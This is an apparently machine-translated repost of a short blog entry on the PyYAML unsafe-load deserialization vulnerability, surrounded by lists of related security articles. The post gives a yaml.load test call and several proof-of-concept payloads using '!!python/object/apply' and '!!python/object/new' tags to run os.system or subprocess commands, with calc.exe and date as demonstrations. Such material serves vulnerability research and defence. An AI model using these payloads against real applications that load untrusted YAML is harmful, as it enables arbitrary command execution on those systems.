pyyaml deserialization vulnerability - Code World

pyyaml deserialization vulnerability

Others 2019-06-17 19:22:13 views: null

Disclaimer: This article is a blogger original article, shall not be reproduced without the bloggers allowed. https://blog.csdn.net/qq1124794084/article/details/87270117

pyyaml parsing contain! ! Is forced to the beginning of the data type is converted into a string format.

test

import yaml
yaml.load('!!python/object/apply:os.system ["date"]')

result

poc also

!!python/object/apply:subprocess.check_output [[calc.exe]]
!!python/object/apply:subprocess.check_output ["calc.exe"]
!!python/object/apply:subprocess.check_output [["calc.exe"]]
!!python/object/apply:os.system ["calc.exe"]
!!python/object/new:subprocess.check_output [["calc.exe"]]
!!python/object/new:os.system ["calc.exe"]

Reference: http://www.polaris-lab.com/index.php/archives/375/

Guess you like

Origin blog.csdn.net/qq1124794084/article/details/87270117

pyyaml deserialization vulnerability

A mall system deserialization vulnerability

Fastjson deserialization vulnerability Overview

On deserialization vulnerability principle PHP

fastjson vulnerability research deserialization (at)

fastjson deserialization RCE Vulnerability

PHP deserialization vulnerability research

Fastjson deserialization vulnerability

PHP deserialization vulnerability summary

UNSERIALIZE-Deserialization vulnerability

Shiro deserialization vulnerability reproduced

weblogic deserialization vulnerability getshell

weblogic deserialization vulnerability getshell

java deserialization vulnerability countermeasures

Fastjson deserialization vulnerability recurrence

Deserialization Vulnerability (PHP)

Vulnerability Risk Notice and Update | Fastjson Deserialization Vulnerability

fastjson vulnerability - Fastjson1.2.47 deserialization vulnerability

fastjson <= 1.2.47 deserialization vulnerability recurring

php deserialization vulnerability reproduction process

Singleton preventing reflection and deserialization vulnerability

Java Shiro deserialization vulnerability reproduced

Getting started with php deserialization vulnerability

Day 23 phar deserialization vulnerability

Weblogic Deserialization Vulnerability Testing and Resolution

Magic method of PHP deserialization vulnerability

Fastjson 1.2.24 deserialization vulnerability reappears

Remote Command Execution and Deserialization——Deserialization Principle Introduction and Analysis of Vulnerability

Remote command execution and deserialization-Weblogic middleware deserialization vulnerability and related

Deserialization penetration and attack and defense (2) Java deserialization vulnerability

Recommended

Ranking

vue project automated build tools 1.0, support for multi-page build

JDBC add, update, delete data

SpringCloud combat service in response to the decline tutorial series (Chapter IV)

A segmentation fault (core dumped) error occurs when C+11 compiles and calls the PCL library

Django achieve websocket

Go语言并发之道--笔记1

Three-tier structure and application

Zhejiang data structure after-school exercise practice two 7-2 Reversing Linked List (25 points)

Front-end interview brushing day9 (updated daily high-frequency inspection points for front-end interviews)

The difference between the shell of the single and double quote

Daily

More

2024-05-02(0)

2024-05-01(4)

2024-04-30(36)

2024-04-29(5)

2024-04-28(12)

2024-04-27(29)

2024-04-26(22)

2024-04-25(32)

2024-04-24(30)

2024-04-23(30)